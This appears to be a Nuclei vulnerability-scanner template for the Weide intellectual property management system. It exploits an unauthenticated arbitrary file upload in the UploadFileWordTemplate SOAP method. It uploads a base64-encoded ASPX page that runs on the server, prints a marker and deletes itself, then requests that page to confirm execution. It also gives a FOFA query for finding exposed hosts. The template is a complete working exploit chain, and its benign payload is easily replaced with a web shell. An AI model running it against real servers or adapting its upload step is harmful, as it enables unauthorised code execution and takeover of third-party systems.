http:
    - raw:
        - |
          POST /AutoUpdate/WSFM.asmx HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
          Content-Type: text/xml; charset=utf-8
          SOAPAction: "http://tempuri.org/UploadFileWordTemplate"

          <?xml version="1.0" encoding="utf-8"?>
          <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
            <soap:Body>
              <UploadFileWordTemplate xmlns="http://tempuri.org/">
                <fileByteArray>PCVAUGFnZSBMYW5ndWFnZT0iQyMiJT48JVJlc3BvbnNlLldyaXRlKCJwYm95am5ucmZpcG1wbHN1a2RlY3p1ZHNlZnhteXdlIik7U3lzdGVtLklPLkZpbGUuRGVsZXRlKFJlcXVlc3QuUGh5c2ljYWxQYXRoKTslPg==</fileByteArray>
                <remotePath>/TemplateFiles/{{username}}.aspx</remotePath>
              </UploadFileWordTemplate>
            </soap:Body>
          </soap:Envelope>
    - matchers:
        - part: body
          type: word
          words:
            - pboyjnnrfipmplsukdeczudsefxmywe
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /TemplateFiles/{{username}}.aspx HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
id: weide-UploadFileWordTemplate-File-upload
info:
    author: Superhero
    description: |-
        fofa: body="JSCOMM/language.js"
        唯徳知识产权管理系统 /AutoUpdate/WSFM.asmx 接口存在任意文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 唯徳知识产权管理系统 UploadFileWordTemplate 任意文件上传漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247487586&idx=1&sn=fc63b2dfe79ca549f6d504451e358107&chksm=c267a551f5102c47a22c50ed217c6c7739903187584ebee7d892b975368fef9bf839f90dd2a4&token=1439003696&lang=zh_CN#rd
    severity: high
    tags:
        - 唯徳知识产权管理系统
variables:
    username: '{{to_lower(rand_base(6))}}'
